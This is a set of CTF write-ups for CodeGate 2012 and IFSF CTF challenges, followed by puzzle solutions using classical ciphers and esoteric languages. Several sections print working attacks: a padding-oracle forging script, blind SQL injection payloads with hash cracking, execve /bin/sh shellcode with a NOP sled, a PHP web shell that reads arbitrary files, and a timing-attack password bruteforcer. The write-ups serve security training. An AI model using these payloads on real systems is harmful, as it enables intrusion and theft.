uid=1001(yesMan) gid=1001(yesMan) euid=1002(yesMan2) groups=1001(yesMan)
bash-4.1$ _

Pwned!

bash-4.1$ cat /home/yesMan/password >&2
Format_String_Bug_Hunter!@#$

Flag is Format_String_Bug_Hunter!@#$

CodeGate 2012 Quals – Vuln 400

hellman — Sun, 26 Feb 2012 12:30:11 +0000

Here’s a web-based crypto challenge.

Summary: padding oracle attack, bit flipping

We are given a bunch of ‘citizen’ certificates. Our aim is to login as ‘king’. Let’s analyze the certificate:

M8EdPtY517M=cACNHQhdH/I=

Looks like it’s a splitted pair of base64:

$ echo M8EdPtY517M= | base64 -d | xxd
0000000: 33c1 1d3e d639 d7b3                      3..>.9..
$ echo cACNHQhdH/I= | base64 -d | xxd
0000000: 7000 8d1d 085d 1ff2                      p....]..

Let’s try to change some bits and submit it:
vuln400submit.py

$ py vuln400submit.py '33c11d3ed639d7b3' '70008d1d085d1ff2'
LOG: LOGIN OK
$ py vuln400submit.py '33c11d3ed639d7b0' '70008d1d085d1ff2'
LOG: PADDING ERROR
$ py vuln400submit.py '03c11d3ed639d7b3' '70008d1d085d1ff2'
LOG: CLASS ERROR

Oh, we see some errors. But the most interesting is PADDING ERROR. It means we have a padding oracle, which says if the decrypted message correctly padded.

Usually a correct padding is filling the remaining bytes with the value = count of the remaining bytes. E.g. “plain” message in 8-byte block will be padded as “plain\x03\x03\x03″.

We changed the last byte in the first block to get padding error, but padding is usually at the end of the message, right? Looks like the second block depends on the ciphertext of the first, which most probably means it’s CBC chahining mode.

CBC means that the plaintext of the second block is xored with the ciphertext of the first.

How we can use that?

Let’s suppose that the second block is “XXXXXX\x02\x02″. We can flip some bits in the last byte by xoring the last byte of the first block.
If we xor it with 2 ^ 1 then the last byte of the decrypted message will be 2 ^ 2 ^ 1 = 1 and the padding should be right.
If we xor it with another values (except 0), we’ll get a PADDING ERROR, because padding will be broken.

By analogy, if the second block is “XXXXX\x03\x03\x03″, we won’t get PADDING ERROR only when we xor with 3 ^ 1.

So, if we xor the last byte with N ^ 1 and we don’t get PADDING ERROR then the last byte of the plaintext is N.

We can extrapolate this to all byte of the second block, and get a plaintext of it:
full script

alpha = "\x01\x02\x03\x04\x05\x06\x07\x08abcdefghijklmnopqrstuvwxyz"
vals = []
key = ""
for j in xrange(8):
	for i in map(ord, alpha):
		a = "33c11d3ed639d7b3".decode("hex")
		b = "70008d1d085d1ff2".decode("hex")
 
		a = map(ord, a)
		b = map(ord, b)
 
		for k in xrange(7, -1, -1):
			a[k] ^= j + 1
			if 7-k >= len(vals): continue
			a[k] ^= vals[7-k]
 
		a[7-len(vals)] ^= i
		a = "".join(map(chr, a))
		b = "".join(map(chr, b))
 
		res = get_result(a, b)
		if "PADDING" not in res:
			vals.append(i)
			key = chr(i) + key
			print "Got byte:", key
			break

$ py vuln400.py 
Got byte: 
Got byte: c
Got byte: ic
Got byte: tic
Got byte: itic
Got byte: zitic
Got byte: ezitic
Got byte: nezitic

Yeah, it’s the plaintext! Let’s remember our goal: we need to login as “king”. It’s easy: we need second block to be “gnik\x04\x04\x04\x04″.

"gnik\x04\x04\x04\x04" -> 0x676e696b04040404
"nezitic\x01" -> 0x6e657a6974696301
0x33c11d3ed639d7b3 ^ 0x676e696b04040404 ^ 0x6e657a6974696301 = 0x3aca0e3ca654b0b6

from base64 import *
open("king.ctf", "wb").write(b64encode("3aca0e3ca654b0b6".decode("hex")) + b64encode("70008d1d085d1ff2".decode("hex")))

Let’s login with king.ctf
:

The flag: MYL0_V3_SCARLET

CodeGate 2012 Quals Net400 Write-up

vos — Sun, 26 Feb 2012 11:14:41 +0000

Because of vulnerability of site in Company A, database which contains user’s information was leaked. The file is dumped packet at the moment of attacking.
Find the administrator’s account information which was leaked from the site.
For reference, some parts of the packet was blind to XXXX.

Answer : strupr(md5(database_name|table_name|decode(password_of_admin)))
(‘|’is just a character)

Download : 80924D4296FCBE81EA5F09CF60542AE7

Net400 featured a network packet capture of a blind SQL injection attack with task to extract some info and bruteforce a bit.

Analyzing the attack

The task pcap carries 15 MB of HTTP traffic between two VMs.
All the requests are made to http://www.cdgate.xxx/sc/id_check.php with ?name= get parameter. Here is a couple requests from the beginning.

GET /sc/id_check.php?name=music%27%20AND%20%27Ohavy%27=%27Ohavy HTTP/1.1
Accept-Encoding: identity
Accept-Language: en-us,en;q=0.5
Host: www.cdgate.xxx
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Connection: close

HTTP/1.1 200 OK
Date: Wed, 22 Feb 2012 09:03:38 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.1 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-2ubuntu4.1
Vary: Accept-Encoding
Content-Length: 4
Connection: close
Content-Type: text/html

$_GET['name'] is set to “music’ AND ‘Ohavy’='Ohavy” and server response is

GET /sc/id_check.php?name=music%27%20AND%20%27Ohavy%27=%27Ohavyy HTTP/1.1
Accept-Encoding: identity
Accept-Language: en-us,en;q=0.5
Host: www.cdgate.xxx
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Connection: close

HTTP/1.1 200 OK
Date: Wed, 22 Feb 2012 09:03:38 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.1 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-2ubuntu4.1
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

$_GET['name'] is “music’ AND ‘Ohavy’='Ohavyy“, server response is empty

It’s an SQL injection, and server prints out
when the SQL query returns some rows (when the condition is TRUE), and gives out empty page when zero rows are returned (condition is FALSE).

Let’s look what info we can extract from the packet trace.

Extracting info, bit by bit

First, we need to gather all URLs that are being requested, with corresponding server answers.

Wireshark only extracts HTTP objects that have non-zero length, so let’s not use it. All the HTTP traffic is plain-text, and it lies as it is inside the PCAP. strings utility allows to get rid of all binary trash, and keep only the text that can be later processed.

Now extracting attack info from pcap boils down to plain-text processing. Content-Length http response header field can be used to determine whether the condition was TRUE (length 4) or FALSE (length 0).

Here’s a script for that:


$f = file_get_contents('strings_out.txt');
preg_match_all('#GET /sc/id_check\.php\?name=(.*?) HTTP/1\.1.+?Content-Length: (\d+)#s', $f, $mt, PREG_SET_ORDER);
foreach ($mt as $m) {
  $query = urldecode($m[1]);
  echo "Query: $query\n";
  $length = $m[2];
  if ($length == 0) {
    echo "Result: FALSE\n";
  } elseif ($length == 4) {
    echo "Result: TRUE\n";
  } else {
    echo "Result: $length\n";
  }
}
?>

Download output.

Attacker extracts info from database using a series of SQL queries. A query consists of 4 parts:

music' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR(10000)), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 1, 1), 4, 1)) > 112 AND 'idobQ'='idobQ

SQL query
Character position
ASCII probe

With a series of SQL queries with different ASCII probes a single character can be extracted. Varying Character position, we can get the entire SQL query result char-by-char.

A script that assebles SQL query results bit-by-bit:


$f = file_get_contents("sql_queries_results.txt");
preg_match_all('#Query: music\' AND ORD\(MID\((.+?), (\d+), \d+\)\) > (\d+) AND \'\w+\'=\'\w+\nResult: (TRUE|FALSE)\n#s', $f, $mt, PREG_SET_ORDER);
 
$datas = array();
 
foreach ($mt as $cm) {
  $query = $cm[1];
  $pos = $cm[2];
  $probe = (int)$cm[3];
  $result = $cm[4];
 
  if (!isset($datas[$query]))
    $datas[$query] = array();
  if (!isset($datas[$query][$pos]))
    $datas[$query][$pos] = array(0 => 0, 1 => 255);
  if ($result == "TRUE") {
    $datas[$query][$pos][0] = $probe + 1;
  } else {
    $datas[$query][$pos][1] = $probe;
  }
}
 
$decoded = array();
 
foreach ($datas as $query => $chars) {
  $str = '';
  foreach ($chars as $char) {
    $str .= chr($char[0]);
  }
  $decoded[$query] = $str;
}
 
print_r($decoded);
?>

Download output.

The flag

Answer : strupr(md5(database_name|table_name|decode(password_of_admin)))

Database name is cdgate:

(IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))) => cdgate

Table name is member:

(SELECT IFNULL(CAST(TABLE_NAME AS CHAR(10000)), CHAR(32)) FROM information_schema.TABLES WHERE table_schema=CHAR(X,X,X,X,X,X) LIMIT 0, 1) => member

Passwords are hashed using MySQL5 algorithm. Let’s bruteforce:

*300102BEB9E4DABEB8BD60BB9BB6686A6272C787
*1763CA06A6BF4E96A671D674E855043A9C7886B2
*C5404E97FF933A91C48743E0C4063B2774F052DD
*DBA29A581E9689455787B273C91D77F03D7FAD5B
*8E4ADF66627261AC0DE1733F55C7A0B72EC113FB
*FDDA9468184E298A054803261A4753FF4657E889
*0ECBFBFE8116C7612A537E558FB7BE1293576B78
*EEFD19E63FA33259154630DE24A2B17772FAC630:lynco
*6FF638106693EF27772523B0D5C9BFAF4DD292F1
*87A5750BB01F1E52060CF8EC90FB1344B1D413AA:mouse
*DDD9B83818DB7B634C88AD49396F54BD0DE31677:etagcd <==
*3E8563E916A490A13918AF7385B8FF865C221039
*18DF7FA3EE218ACB28E69AF1D643091052A95887

echo strtoupper(md5('cdgate|member|etagcd'));
AB6FCA7FFC88710CFBC37D5DF9A25F3F

Flag is AB6FCA7FFC88710CFBC37D5DF9A25F3F

CodeGate 2012 Quals – Vuln 300

hellman — Sun, 26 Feb 2012 11:11:12 +0000

Here we are given ssh credentials where we need to exploit the binary.

Summary: compose file to make program jump to stack.

Let’s decompile it the binary:

int func() {
    puts("func");
    return 0;
}
 
int main(int argc, char *argv[]) {
    char s[12];
    memset(s, 0x90u, 0x12u);
    FILE *stream = fopen(argv[1], "r");
    if (stream) {
        int nread = fread(s, 1u, 0xCu, stream);
        if (nread == 12) {
            fclose(stream);
 
            void (*ptr)() = func; // 0x08048540
            unsigned int b4 = (s[4] | 1) ^ 0xE0;
            unsigned int b3 = (s[1] | 1) ^ 0xE0;
            b3 <<= 16;
            b4 <<= 24;
            strncpy(test, s, 0x12u); // ???
            ptr = (b4 | b3 | ptr);
            ptr();
            return 0;
        }
    }
    return 1;
}

The algorithm is simple – 12 bytes are read from argv[1] and 2nd and 5th are used to modify ptr which is called later.

The stack here is executable, so it’s straightforward: we should make ptr pointing to stack to our payload.

The stack addresses here are like 0xbfbfXXXX. So, the needed symbol is
0xBF ^ 0xE0 = '_' or
0xBF ^ 0xE1 = '^'

So, if we put twelve “_” into a file, we’ll jump to 0xbfbf8540.

Then we just put this stuff into a file and push a huge nopsled with shellcode:

$ mkdir /tmp/solve
$ cd /tmp/solve
$ export SC="` perl -e 'print "\x90"x100000 . "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2\x52\x57\x54\xb0\x3b\xcd\x80\xe8\xee\xff\xff\xff/bin/sh";'`"
$ echo '^^^^^^^^^^^^^^^^^^^^^^^' >test
~/X ./test
 
$ cat ~/password
key_is_The_davinci_cod3_!

The flag: key_is_The_davinci_cod3_!

CodeGate 2012 Quals – Vuln 200

hellman — Sun, 26 Feb 2012 10:36:33 +0000

This web challenge is again about uploading.

Our aim was to get shell.

Summary: upload php shell, read the key.

We need to get a shell, so it should be a good idea to upload a php script. But there’s a check on extension!

Luckily, only a presence of “.jpg” is checked, so we can upload “shell.jpg.php” file.

Let’s upload this simple shell:

shell.jpg.php:

 
if ($_GET["d"])
	print_r(scandir($_GET["d"]));
if ($_GET["f"])
	echo highlight_file($_GET["f"]);
?>

With this script we can list any directory and read any file. Let’s find the key. Usually on Win servers it’s located on the user’s Desktop:

http://1.234.41.9/1olOI01/images/c6f8…4d81.php?d=c:\users
Array ( [0] => . [1] => .. [2] => All Users [3] => Default [4] => Default User [5] => Public [6] => codegate2 [7] => desktop.ini [8] => test )

http://1.234.41.9/1olOI01/images/c6f8…4d81.php?d=c:\users\codegate2\desktop\
Array ( [0] => . [1] => .. [2] => APMSETUP Monitor.lnk [3] => Codegate 2012 Key.txt [4] => desktop.ini )

Yes, here it is:

http://1.234.41.9/1olOI01/images/c6f8…4d81.php?f=c:\users\codegate2\desktop\Codegate%202012%20Key.txt

 
/* 
Good Job ! 
 
Key is 16b7a4c5162d4dee6a0a6286cd475dfb 
*/ 
?> 1

The flag: 16b7a4c5162d4dee6a0a6286cd475dfb

CodeGate 2012 Quals – Vuln 100

hellman — Sun, 26 Feb 2012 10:09:43 +0000

This challenge is a web service where one can upload mp3 files and listen to them.

Our aim is to get admin’s song.

Summary: sql injection

Files uploading takes 3 parameters: mp3, genre and title. After some tries it’s easy to see, that there’s SQL Injection in genre field.

We can guess that the query is like:
INSERT INTO some_table (mp3, genre, title) VALUES ("....", GENRE, "TITLE");

Let’s send genre = 3,(SELECT 123+123)) --

The result:

Now we can make any query we want. Let’s look at databases and tables:
vuln100query.py

$ py vuln100query.py "SELECT schema_name FROM information_schema.schemata LIMIT 1, 1"
codegate_mp3
$ hexenc codegate_mp3
636f6465676174655f6d7033
$ py vuln100query.py "SELECT table_name FROM information_schema.tables WHERE table_schema=0x636f6465676174655f6d7033 LIMIT 0, 1"
upload_mp3_101_50_134_99

Looks like there’s a table for all visitors’ IP addresses. Admin should have IP 127.0.0.1, right?

$ hexenc 'upload_mp3_127_0_0_1'
75706c6f61645f6d70335f3132375f305f305f31
$ py vuln100query.py "SELECT column_name FROM information_schema.columns WHERE table_name=0x75706c6f61645f6d70335f3132375f305f305f31 LIMIT 0,1"
idx
$ py vuln100query.py "SELECT column_name FROM information_schema.columns WHERE table_name=0x75706c6f61645f6d70335f3132375f305f305f31 LIMIT 1,1"
genre
$ py vuln100query.py "SELECT column_name FROM information_schema.columns WHERE table_name=0x75706c6f61645f6d70335f3132375f305f305f31 LIMIT 2,1"
title
$ py vuln100query.py "SELECT column_name FROM information_schema.columns WHERE table_name=0x75706c6f61645f6d70335f3132375f305f305f31 LIMIT 3,1"
file

So, the table name is upload_mp3_127_0_0_1 and there are 4 fields: idx, genre, title, file.

If we try to get file, we’ll receive only first 32767 bytes because the title field is of that size. But the mp3 file looks to be larger!

We can dump the file by 32767 blocks using SUBSTR:
full script

f = open("out.mp3","w")
s = ""
for i in range(1000):
	s1 = query("select hex(substr(file, 1+%d, 30000)) from upload_mp3_127_0_0_1" % (i*30000))
	if s1 != s: 
		s = s1
		f.write(s.decode("hex"))
		print i
	else:
		quit()

The result: out.mp3

Listen and write the flag: UPL04D4NDP14Y

CodeGate 2012 Quals – Binary 200

zyx2145 — Sat, 25 Feb 2012 23:37:45 +0000

Find a printable string that the program would print ultimately.

Down

Summary: unpack, XTEA decrypt

The program is packed PE x86 executable file (dll). The packer was easy, and it took few minute to get a unpacked file (PE tools + ImpRec).
The program consists of a lot of functions, but the most of them are not interesting for us.
The most interesting part of the program is located at address 1000169E

How you can guess “TeaDecryptEncrypt” function is my favorite and adored XTEA crypto function.
It consists of encrypt and decrypt function, but we are interested in only decrypt one.

After analysis of all parameters of function, we reconstructed whole algorithm:

#include 
#include 
 
#define uint32_t unsigned int
int prem_data(unsigned int *new_key, unsigned char* key)
{
  int result, i;
  result = 0;
  new_key[0] = 0;
  new_key[1] = 0;
  new_key[2] = 0;
  new_key[3] = 0;
  for ( i = 0; i < 4; ++i )
  {
    result = i;
    new_key[i] = key[4*i+3] | (key[4*i+2] << 8) | (key[4*i+1] << 16) | (key[4*i] << 24);
  }
  return result;
}
void decrypt4 (uint32_t* v, uint32_t* k, unsigned char* new_keys) 
{
    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i;  /* set up */
    uint32_t delta=0x61C88647;                     /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
 
    unsigned char* vv = (unsigned char*)v;
    v0 = vv[3] | (vv[2] << 8) | (vv[1] << 16) | (vv[0] << 24);
    v1 = vv[7] | (vv[6] << 8) | (vv[5] << 16) | (vv[4] << 24);
 
    for (i=0; i < 0x20; i++) 
    {                 
	v1 -= (((v0<<4)^(v0>>5)) + v0) ^ (sum + k[(sum>>11) & 3]);
	sum += delta;                                   
	v0 -= (((v1<<4)^(v1>>5)) + v1) ^ (sum + k[sum & 3]);                                 
 
    }                                              /* end cycle */
    v[0]=v0; v[1]=v1;
 
    new_keys[0] = (unsigned char)(v0 >> 24);
    new_keys[1] = (unsigned char)(v0 >> 16);
    new_keys[2] = (unsigned char)(v0 >> 8);
    new_keys[3] = (unsigned char)v0;
    new_keys[4] = (unsigned char)(v1 >> 24);
    new_keys[5] = (unsigned char)(v1 >> 16);
    new_keys[6] = (unsigned char)(v1 >> 8);
    new_keys[7] = (unsigned char)(v1);
}
unsigned char g_data[17]   = "\x1E\xa0\xf5\xc6\xD9\xec\x02\xf6\x59\x18\x7c\x2e\x6f\x85\x5d\xde";
unsigned char hardcoded_keys[17] = "\x1E\xAE\xA1\xC7\xB3\x50\x6D\x02\x5A\x61\x33\xE4\x5B\xF0\x13\x8A";
void main()
{
	unsigned char tmp_data[17];
	prem_data((uint32_t*)tmp_data, g_data);
	decrypt4 ((uint32_t*)hardcoded_keys, (uint32_t*)tmp_data, (unsigned char*)tmp_data);
	tmp_data[8] = '\0';
	printf("Key: %s", tmp_data);
}

C:\ctf\codegate2012\bin200\tea_2\debug>tea.exe
Key: &I%W=K)l

IFSF CTF #7 (X99) Write-up

vos — Mon, 13 Feb 2012 13:18:06 +0000

this is one of their machines which have very sensitive informations ,
try to get for us the password

208.64.122.27
PORT : 3000

X99 carries a synthetic vulnerability that allows a char-by-char password bruteforce.

The setup

The service gives us an auth request upon connection:

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 _    _  99   _________   ______   ______  _    _  _____  ______   ______
\ \  / /     | | | | | \ | |  | | | |     | |  | |  | |  | |  \ \ | |
 >|--|<      | | | | | | | |__| | | |     | |--| |  | |  | |  | | | |----
/_/  \_\     |_| |_| |_| |_|  |_| |_|____ |_|  |_| _|_|_ |_|  |_| |_|____
 
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 
Authentication Required
Password : pass
 
Authentication Failed ....
Password : _

The time

The thing that can be noticed, is that it hangs for a while when supplied password starts with ‘w‘:

Authentication Required
Password : hello
 
Authentication Failed ....
Password : world
   *** 5 seconds pass.. ***
Authentication Failed ....

Turns out it is a synthetic time-based side channel analogue, with overboosted time delays.
Each matching password letter increases the delay by 5 seconds.

The exploit

The correct password can be found via bruteforcing password letter-by-letter, and here is a script for that:


function new_socket() {
  $sock = fsockopen("208.64.122.27", 3000);
  while (trim(fgets($sock)) != 'Authentication Required');
  fread($sock, 11);  // Skip 'Password : '
  return $sock;
}
 
$charset = str_split("qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_-.");
$sockets = $times = array();
$guessed = isset($_SERVER['argv'][1]) ? $_SERVER['argv'][1] : '';  // can resume session if anything goes wrong
 
while (true) {
  echo "Guessed '$guessed'\n";
 
  echo "    Creating sockets";
  foreach ($charset as $letter) {
    $sockets[$letter] = new_socket();
    echo ".";
  }
  echo "\n";
 
  echo "   Writing passwords";
  foreach ($sockets as $letter => $sock) {
    fwrite($sock, $guessed . $letter);
    echo ".";
  }
  echo "\n";
 
  echo "        Writing \\n's";
  foreach ($sockets as $letter => $sock) {
    fwrite($sock, "\n");
    $times[$letter] = microtime(true);
    echo ".";
    stream_set_blocking($sock, false);  // Turning off blocking for read attempts
  }
  echo "\n";
 
  echo "Waiting for response";
  while (!empty($sockets)) {
    foreach ($sockets as $letter => $sock) {
      $c = fgetc($sock);
      if ($c !== false) {
        $times[$letter] = microtime(true) - $times[$letter];
        fclose($sock);
        unset($sockets[$letter]);
        echo '.';
      }
    }
    usleep(10000);
  }
  echo "\n\n";
 
  echo "===== Response times\n";
  $nextLetter = false;
  foreach ($times as $letter => $time) {
    if ($time > 5 * (strlen($guessed) + 1)) {
      $nextLetter = $letter;
      echo "*$letter* - " . round($time) . "\t";
    } else {
      echo "$letter - " . round($time) . "\t";
    }
  }
  echo "\n\n";
 
  if ($nextLetter === false) {
    break;
  } else {
    $guessed .= $nextLetter;
  }
 
}
 
echo "\nWork done!\nPassword is: $guessed\n";
?>

The script utilizes multiple connections to target server so it doesn’t have to wait 5*N seconds for each letter from charset, instead all the charset is tried simultaneously.

Let’s run it:

F:\>d:\php\php_fast.cmd x99.php
Guessed ''
..............
..............
*** approx. 30 mins later ***
..............
Work done!
Password is: w3_0wn_7h15_f0r_r34L

Password: w3_0wn_7h15_f0r_r34L

The flag

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 _    _  99   _________   ______   ______  _    _  _____  ______   ______
\ \  / /     | | | | | \ | |  | | | |     | |  | |  | |  | |  \ \ | |
 >|--|<      | | | | | | | |__| | | |     | |--| |  | |  | |  | | | |----
/_/  \_\     |_| |_| |_| |_|  |_| |_|____ |_|  |_| _|_|_ |_|  |_| |_|____
 
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 
Authentication Required
Password : w3_0wn_7h15_f0r_r34L
 
 
 
 
                 +-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-
 
                Game Flag : 0xFEFERKJ8389743GH79G6D368GT093
 
                 +-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-

Flag: 0xFEFERKJ8389743GH79G6D368GT093

IFSF CTF Small Challenges (#4, #5, #6, #14, #15)

vos — Mon, 13 Feb 2012 12:01:57 +0000

#4 ER
#5 Change
#6 Call me
#14 Seek me
#15 Embedded docs

#4 ER

Uhg uevn “dqsxpivacb yleqsy” kt uwfe vt nndmcawj e ncsrcuizf hgswe tlat lsglweeu b bvpbf xjlegtirs sf (ppt pfcittcwnly veldyid) csgwnerut htw thi exlxxepde qg gvbof htnstirdhmeu.[1] Uhg uevn ju kweqyenwqc uufd dz sgipnfws ard iq uspwmat dupuvtj yo ihenwnjy ufctft qjmkyfry, fannnrg, qs pqmixjdcq fctmonv fmmge av “ttibmksl” poaer, ptrea, pr hseiepo, kwom “xhe sjspnf”.[ckuaxjpp sjedid]
<....>
jpxyitytirsw, au seeprhfe ks, kor ixapupe, udhqmavmz fthumintv tv mcjnuuribn ojiia veprwxs, tbtjfr xibp xjcritiyj gocmivjort ph nsdizidxfps.[14]
#yjkkqehjb

Solution

Text encoded using Vigenere cipher (identified by trial and error).
Grab CrypTool v1, Analysis – Symmetric classic – Ciphertext-only – Vigenere
The flag is encryption key: BACBAEBBCFFAAEAADFEAC

#5 Change

Txc Azr Adlr txcqhv zj txc ihcydznzlr fqjgqnqrzfdn gqbcn txdt cpindzlj txc cdhnv bcycnqigclt qe txc Klzychjc.[1] Dffqhbzlr tq txc Azr Adlr txcqhv, txc Klzychjc udj qlfc zl dl cpthcgcnv xqt dlb bcljc jtdtc uxzfx cpidlbcb hdizbnv. Txzj hdizb cpidljzql fdkjcb txc vqklr Klzychjc tq fqqn dlb hcjkntcb zl ztj ihcjclt fqltzlkqkjnv cpidlbzlr jtdtc. Dffqhbzlr tq txc gqjt hcfclt gcdjkhcgcltj dlb qajchydtzqlj, txzj qhzrzldn jtdtc cpzjtcb diihqpzgdtcnv 13.7 aznnzql vcdhj drq,[2][3] uxzfx zj
<....>
adfmrhqklb hdbzdtzql zl 1964, dlb cjicfzdnnv uxcl ztj jicfthkg (z.c., txc dgqklt qe hdbzdtzql gcdjkhcb dt cdfx udycnclrtx) udj eqklb tq gdtfx txdt qe txchgdn hdbzdtzql ehqg d andfm aqbv, gqjt jfzcltzjtj uchc edzhnv fqlyzlfcb av txc cyzbclfc txdt jqgc ychjzql qe txc Azr Adlr jfcldhzq gkjt xdyc qffkhhcb. — uzmzicbzd

Solution

Text encoded using Simple substitution cipher.
Grab the same CrypTool v1, Analysis – Symmetric classic – Ciphertext-only – Substitution
The flag is encryption key: DAFBCERXZWMNGLQIOHJTKYUPVS

#6 Call me

6-666-22-444-555-33-444-7777-222-666-666-555-7777-88-22-6-444-8-8-44-444-7777-333-666-777-7777-666-6-33-7-666-444-66-8-7777

Solution

Cellphone keypad cipher :-)
Grab a cellphone keypad and write a text pressing the numbers in the sequence.
The flag: MOBILEISCOOLSUBMITTHISFORSOMEPOINTS

#14 Seek me

Can you Find me ? :)

Solution

Yes we can, bruteforce ?id= parameter on taskboard until you get to 1338.
The error message on that page is not just an error message :)

Challenge Doesn't Exist

Decode 73, 115, 84, 104, 105, 83, 82, 101, 97, 76, 76, 121, 72, 73, 68, 68, 69, 78 from decimal, get flag: IsThiSReaLLyHIDDEN

#15 Embedded docs

those are some files we could reach ,
but we couldn’t get what are they about
try to get what you can do !

http://ctf.forbiddenbits.net/Secrets.zip

Grab Secrets.zip

001

0011000000110010001101010011000100110110001110000110000100110101001100110011010100110111011001100011100101100101001100000110000101100100001101110110011001100011001101110011001000110110011001100110011001100001001100100011011100111001001101000011010100110100

Decode from binary, get flag: 025168a5357f9e0ad7fc726ffa279454

002

YmM1OTJkOGI5YjhmYzRkODQ4NTU3NDI4NDU2ZWIzYWM=

Unbase64, get flag: bc592d8b9b8fc4d848557428456eb3ac

003

102:98:48:100:53:102:50:101:57:101:102:97:99:100:97:56:55:54:50:56:49:56:98:52:48:101:101:98:57:50:56:57

Decode from decimal, get flag: fb0d5f2e9efacda8762818b40eeb9289

004

ST_nIoPemoSroFTI_TImbuS-G4lF_3hT_zI_Siht

Flip the string, get flag: thiS_Iz_Th3_Fl4G-SubmIT_ITForSomePoIn_TS

005

So0%2000%2000%2000%20TT%20

Urldecode, get flag: ‘So0 00 00 00 TT ‘ (mind the trailing space)

006

41:4e:4f:54:48:45:52:46:4c:41:47:59:45:53:49:4b:4e:4f:57:49:54:

Decode from hex, get flag: ANOTHERFLAGYESIKNOWIT

007

PNALBHFRRZRVTHRFFLBHQB

Rot13, get flag: CANYOUSEEMEIGUESSYOUDO

008

A rarjpeg (actually, ‘zipjpeg’). Carve zip file from end, bruteforce encryption password ‘pass‘, get flag: 8727a6fd1df003d9870654c16d02d39c

009

BMP. Open with your favorite image editor (MS Paint), do a fill, read the flag: JE5POIBB7KOUB54

010

+ HINT on data format:
 for JS10 format is ***_****_******

HTML with JavaScript, implementing some poor hashing algorithm.
Calculate any valid flag (vos_CPHO_313337), give it to orgs to get a real challenge flag: CAA_AAAA_AAATZ

011

A win32 exe, written in Visual Basic. Use strings, get flag: Th1SiSmYp455w0rD

F:\Secrets>strings 011.exe
....
Th1SiSmYp455w0rD
....

012

HAI
CAN HAS STDIO?
I HAS A VAR
GIMMEH VAR
BTW I LUV EDOCLOL
IZ VAR EQUAL "IHAZZOMVAR"?
	YARLY
		VISIBLE "GUD"
	NOWAI
		VISIBLE "SUX"
	KTHX
KTHXBYE

LOLCODE. Smoke some specs, get flag: IHAZZOMVAR

013

Whitespace. Interpret, get flag (numbers are actually printed one by line): 12345678910

014

 Ingredients.
 105 beer
 102 mushrooms
 72 cheese
 85 jelly
 74 tacos
 69 beans
 
 Method.
 Put mushrooms into the mixing bowl.
 Put beer mustard into the mixing bowl.
 Put cheese mustard into the mixing bowl.
 Put tacos mustard into the mixing bowl.
 Put beans mustard into the mixing bowl.
 Put jelly mustard into the mixing bowl.
 Put cheese mustard into the mixing bowl.
 Liquefy contents of the mixing bowl.
 Pour contents of the mixing bowl into the baking dish.
 
 Serves 1.

Chef. Interpret, get flag: fiHJEUH

015

++++++++[>+>++>+++>++++>+++++>++++++>+++++++>++++++++>+++++++++>++++++++++>+++++++++++>++++++++++++>+++++++++++++>++++++++++++++>+++++++++++++++>++++++++++++++++<<<<<<<<<<<<<<<<-]>>>>>>>>>>>>>--.++<<<<<<<<<<<<<>>>>>>.<<<<<<>>>>>>+++.---<<<<<<>>>>>>.<<<<<<>>>>>>>>>>>>+.-<<<<<<<<<<<<>>>>>>>>>>>>>---.+++<<<<<<<<<<<<<>>>>>>>.<<<<<<<>>>>>>>>>>>>+++.---<<<<<<<<<<<<>>>>>>>>>>>>>----.++++<<<<<<<<<<<<<>>>>>>.<<<<<<>>>>>>>>>>>>>---.+++<<<<<<<<<<<<<>>>>>>++.--<<<<<<>>>>>>>+.-<<<<<<<>>>>>>+++.---<<<<<<>>>>>>>>>>>>>--.++<<<<<<<<<<<<<>>>>>>>>>>>>+++.---<<<<<<<<<<<<>>>>>>+++.---<<<<<<>>>>>>+++.---<<<<<<>>>>>>++.--<<<<<<>>>>>>++.--<<<<<<>>>>>>>+.-<<<<<<<>>>>>>.<<<<<<>>>>>>>>>>>>+++.---<<<<<<<<<<<<>>>>>>>-.+<<<<<<<>>>>>>>>>>>>>--.++<<<<<<<<<<<<<>>>>>>>>>>>>>---.+++<<<<<<<<<<<<<>>>>>>>---.+++<<<<<<<>>>>>>>>>>>>>--.++<<<<<<<<<<<<<>>>>>>>+.-<<<<<<<>>>>>>>>>>>>+++.---<<<<<<<<<<<<>>>>>>>.<<<<<<<>>>>>>>>>>>>+++.---<<<<<<<<<<<<.

Brainfuck. Interpret, get flag: f030ae8cd0e293fc332290c7fe5f9c8c

016

